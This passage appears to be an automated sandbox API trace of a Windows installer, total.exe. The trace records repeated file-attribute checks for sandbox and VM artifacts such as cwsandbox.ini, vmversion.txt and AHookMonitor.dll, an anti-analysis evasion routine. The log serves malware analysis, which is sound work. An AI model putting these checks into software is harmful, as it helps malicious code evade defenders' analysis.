lpString1="CloseHandle") returned="CloseHandle" [0157.873] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.874] GetProcAddress (hModule=0x75c90000, lpProcName="CloseHandle") returned 0x75ca1410 [0157.874] lstrcpynA (in: lpString1=0x321398, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.874] CloseHandle (hObject=0xfefedeaf) returned 0 [0157.874] wsprintfA (in: param_1=0x321398, param_2="%d" | out: param_1="-16851281") returned 9 [0157.874] wsprintfA (in: param_1=0x321398, param_2="%d" | out: param_1="0") returned 1 [0157.874] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.874] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.874] lstrlenA (lpString="0") returned 1 [0157.874] lstrcpynA (in: lpString1=0x40a418, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.874] lstrlenA (lpString="FALSE") returned 5 [0157.874] lstrcpynA (in: lpString1=0x432800, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.874] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.874] lstrcpynA (in: lpString1=0x42e3a0, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.874] lstrlenA (lpString="FALSE") returned 5 [0157.874] lstrcpynA (in: lpString1=0x40ac18, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.874] lstrcpynA (in: lpString1=0x40b018, lpString2="TRUE", iMaxLength=1024 | out: lpString1="TRUE") returned="TRUE" [0157.874] lstrcmpiA (lpString1="FALSE", lpString2="TRUE") returned -1 [0157.875] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.875] lstrlenA (lpString="") returned 0 [0157.875] lstrcpynA (in: lpString1=0x31400c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.875] lstrcpynA 
(in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.875] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.875] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.875] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.875] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.875] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.875] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.875] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.875] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.875] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: 
"c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.876] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.876] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetFileAttributes(t 'c:\\cwsandbox\\cwsandbox.ini')i .R0", iMaxLength=1024 | out: lpString1="kernel32::GetFileAttributes(t 'c:\\cwsandbox\\cwsandbox.ini')i .R0") returned="kernel32::GetFileAttributes(t 'c:\\cwsandbox\\cwsandbox.ini')i .R0" [0157.876] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.876] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.876] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.876] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.876] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.876] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.877] lstrcpyA (in: lpString1=0x321398, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.877] lstrcpyA (in: lpString1=0x3217a8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" 
[0157.877] lstrcpyA (in: lpString1=0x321ba8, lpString2="GetFileAttributes" | out: lpString1="GetFileAttributes") returned="GetFileAttributes" [0157.877] lstrcpynA (in: lpString1=0x322c50, lpString2="c:\\cwsandbox\\cwsandbox.ini", iMaxLength=1024 | out: lpString1="c:\\cwsandbox\\cwsandbox.ini") returned="c:\\cwsandbox\\cwsandbox.ini" [0157.877] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.877] GetProcAddress (hModule=0x75c90000, lpProcName="GetFileAttributes") returned 0x0 [0157.877] lstrlenA (lpString="GetFileAttributes") returned 17 [0157.877] GetProcAddress (hModule=0x75c90000, lpProcName="GetFileAttributesA") returned 0x75ca5414 [0157.877] lstrcpynA (in: lpString1=0x321398, lpString2="c:\\cwsandbox\\cwsandbox.ini", iMaxLength=1024 | out: lpString1="c:\\cwsandbox\\cwsandbox.ini") returned="c:\\cwsandbox\\cwsandbox.ini" [0157.877] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.878] GetFileAttributesA (lpFileName="c:\\cwsandbox\\cwsandbox.ini" (normalized: "c:\\cwsandbox\\cwsandbox.ini")) returned 0xffffffff [0157.878] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\cwsandbox\\cwsandbox.ini", iMaxLength=1024 | out: lpString1="c:\\cwsandbox\\cwsandbox.ini") returned="c:\\cwsandbox\\cwsandbox.ini" [0157.878] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="-1") returned 2 [0157.878] lstrcpyA (in: lpString1=0x432800, lpString2="-1" | out: lpString1="-1") returned="-1" [0157.878] lstrcpynA (in: lpString1=0x42e3a0, lpString2="-1", iMaxLength=1024 | out: lpString1="-1") returned="-1" [0157.878] lstrlenA (lpString="-1") returned 2 [0157.878] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.878] lstrlenA 
(lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.878] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.878] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.878] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.878] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.879] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.879] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.879] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.879] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.879] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.879] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetFileAttributes(t 'c:\\test\\vmversion.txt')i .R0", iMaxLength=1024 | out: lpString1="kernel32::GetFileAttributes(t 'c:\\test\\vmversion.txt')i .R0") returned="kernel32::GetFileAttributes(t 'c:\\test\\vmversion.txt')i .R0" [0157.879] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.879] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.879] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.880] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.880] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.880] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.880] lstrcpyA (in: lpString1=0x321398, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.880] lstrcpyA (in: lpString1=0x3217a8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.880] lstrcpyA (in: lpString1=0x321ba8, lpString2="GetFileAttributes" | out: lpString1="GetFileAttributes") returned="GetFileAttributes" [0157.880] lstrcpynA (in: lpString1=0x322c50, lpString2="c:\\test\\vmversion.txt", iMaxLength=1024 | out: lpString1="c:\\test\\vmversion.txt") returned="c:\\test\\vmversion.txt" 
[0157.880] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.881] GetProcAddress (hModule=0x75c90000, lpProcName="GetFileAttributes") returned 0x0 [0157.881] lstrlenA (lpString="GetFileAttributes") returned 17 [0157.881] GetProcAddress (hModule=0x75c90000, lpProcName="GetFileAttributesA") returned 0x75ca5414 [0157.881] lstrcpynA (in: lpString1=0x321398, lpString2="c:\\test\\vmversion.txt", iMaxLength=1024 | out: lpString1="c:\\test\\vmversion.txt") returned="c:\\test\\vmversion.txt" [0157.881] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.881] GetFileAttributesA (lpFileName="c:\\test\\vmversion.txt" (normalized: "c:\\test\\vmversion.txt")) returned 0xffffffff [0157.881] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\test\\vmversion.txt", iMaxLength=1024 | out: lpString1="c:\\test\\vmversion.txt") returned="c:\\test\\vmversion.txt" [0157.881] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="-1") returned 2 [0157.881] lstrcpyA (in: lpString1=0x432800, lpString2="-1" | out: lpString1="-1") returned="-1" [0157.881] lstrcpynA (in: lpString1=0x42e3a0, lpString2="-1", iMaxLength=1024 | out: lpString1="-1") returned="-1" [0157.881] lstrlenA (lpString="-1") returned 2 [0157.881] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.882] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.882] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.882] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: 
lpString1="") returned="" [0157.882] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.882] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.882] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.882] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.882] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.882] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.882] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.883] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetFileAttributes(t 'c:\\bin\\AHookMonitor.dll')i .R0", iMaxLength=1024 | out: lpString1="kernel32::GetFileAttributes(t 'c:\\bin\\AHookMonitor.dll')i .R0") returned="kernel32::GetFileAttributes(t 'c:\\bin\\AHookMonitor.dll')i .R0" [0157.883] 
lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.883] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.883] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.883] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.883] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.883] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.883] lstrcpyA (in: lpString1=0x321398, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.883] lstrcpyA (in: lpString1=0x3217a8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.883] lstrcpyA (in: lpString1=0x321ba8, lpString2="GetFileAttributes" | out: lpString1="GetFileAttributes") returned="GetFileAttributes" [0157.883] lstrcpynA (in: lpString1=0x322c50, lpString2="c:\\bin\\AHookMonitor.dll", iMaxLength=1024 | out: lpString1="c:\\bin\\AHookMonitor.dll") returned="c:\\bin\\AHookMonitor.dll" [0157.884] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.884] GetProcAddress (hModule=0x75c90000, lpProcName="GetFileAttributes") returned 0x0 [0157.884] lstrlenA (lpString="GetFileAttributes") returned 17 [0157.884] GetProcAddress (hModule=0x75c90000, lpProcName="GetFileAttributesA") returned 0x75ca5414 [0157.884] lstrcpynA (in: lpString1=0x321398, lpString2="c:\\bin\\AHookMonitor.dll", iMaxLength=1024 | out: 
lpString1="c:\\bin\\AHookMonitor.dll") returned="c:\\bin\\AHookMonitor.dll" [0157.884] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.884] GetFileAttributesA (lpFileName="c:\\bin\\AHookMonitor.dll" (normalized: "c:\\bin\\ahookmonitor.dll")) returned 0xffffffff [0157.885] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\bin\\AHookMonitor.dll", iMaxLength=1024 | out: lpString1="c:\\bin\\AHookMonitor.dll") returned="c:\\bin\\AHookMonitor.dll" [0157.885] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="-1") returned 2 [0157.885] lstrcpyA (in: lpString1=0x432800, lpString2="-1" | out: lpString1="-1") returned="-1" [0157.885] lstrcpynA (in: lpString1=0x42e3a0, lpString2="-1", iMaxLength=1024 | out: lpString1="-1") returned="-1" [0157.885] lstrlenA (lpString="-1") returned 2 [0157.885] lstrcpynA (in: lpString1=0x40a418, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.885] lstrlenA (lpString="FALSE") returned 5 [0157.886] lstrcpynA (in: lpString1=0x432800, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.886] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.886] lstrcpynA (in: lpString1=0x42e3a0, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.886] lstrlenA (lpString="FALSE") returned 5 [0157.886] lstrcpynA (in: lpString1=0x40ac18, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.886] lstrcpynA (in: lpString1=0x40b018, lpString2="TRUE", iMaxLength=1024 | out: lpString1="TRUE") returned="TRUE" [0157.886] lstrcmpiA (lpString1="FALSE", lpString2="TRUE") returned -1 [0157.886] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.886] lstrlenA (lpString="") returned 0 [0157.886] lstrcpynA (in: lpString1=0x31400c, lpString2="", iMaxLength=1024 | out: lpString1="") 
returned="" [0157.886] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.886] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.886] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.886] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.886] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.886] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.887] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.887] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.887] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.887] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: 
"c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.887] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.887] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetModuleFileName(i 0, t .R1, i 1024)i.R0", iMaxLength=1024 | out: lpString1="kernel32::GetModuleFileName(i 0, t .R1, i 1024)i.R0") returned="kernel32::GetModuleFileName(i 0, t .R1, i 1024)i.R0" [0157.887] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.887] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.887] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.888] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.888] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.888] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.888] lstrcpyA (in: lpString1=0x321398, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.888] lstrcpyA (in: lpString1=0x3217a8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.888] lstrcpyA (in: lpString1=0x321ba8, 
lpString2="GetModuleFileName" | out: lpString1="GetModuleFileName") returned="GetModuleFileName" [0157.888] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.889] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleFileName") returned 0x0 [0157.889] lstrlenA (lpString="GetModuleFileName") returned 17 [0157.889] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleFileNameA") returned 0x75ca14b1 [0157.889] lstrcpynA (in: lpString1=0x322c50, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.889] lstrcpynA (in: lpString1=0x321398, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.889] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.889] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x321398, nSize=0x400 | out: lpFilename="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe")) returned 0x2e [0157.889] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="1024") returned 4 [0157.889] lstrcpynA (in: lpString1=0x314418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") 